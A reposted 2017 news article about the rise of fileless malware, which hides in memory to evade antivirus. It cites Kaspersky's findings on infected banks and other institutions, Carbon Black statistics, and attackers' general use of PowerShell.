[Note: This item comes from friend Steve Goldstein. DLH]
Say Hello to the Super-Stealthy Malware That’s Going Mainstream
By LILY HAY NEWMAN
Feb 9 2017
Typical anti-malware software scans hard drives in search of malicious files, and then flags them for removal. That strategy breaks down, though, when there’s no file to find on the system in the first place. And that’s exactly how an increasingly popular type of attack has stymied the defenses of dozens of banks around the world.
So-called fileless malware avoids detection by hiding its payload in secluded spots, like a computer’s random-access memory or kernel, meaning it doesn’t depend on hard drive files to run. The technique first surfaced a couple of years ago, as part of a sophisticated nation-state reconnaissance attack, but has experienced a recent surge in popularity. It’s also not just hitting high-priority targets; research released by Kaspersky Lab on Wednesday found that fileless malware infected more than 140 financial institutions, government organizations, and telecom companies across 40 countries.
Kaspersky itself may not have found it had a bank not come to the security firm after discovering malware running in secret in the memory of one of its domain controllers (a server on a Windows network that handles security authentication queries). The attack was recording system administrator credentials so the hackers could move deeper into the network, gather more privileged credentials, and eventually withdraw money from ATMs.
What makes the attack so insidious is that it inhabits parts of the computer architecture that are difficult for normal users to even navigate to and access, much less interact with. While it’s possible to eliminate the threat, many organizations aren’t even focused on spotting it in the first place yet.
That’s unfortunate, because it’s also seen a dramatic spike in popularity. In a December report, the endpoint security firm Carbon Black found that the rate of fileless malware attacks among its customers had jumped from three percent of the company’s total malware detections at the beginning of 2016 to 13 percent in November.
“I would say this is becoming more of a checkbox for attackers’ toolkits,” says Greg Linares, a security researcher who specializes in threat intelligence and reverse engineering. Just one example: Hackers can use administrative operating system tools, like the Windows PowerShell framework, to covertly deposit the malware into a computer’s RAM. More than 70 percent of the infections Kaspersky detected utilized malicious PowerShell scripts.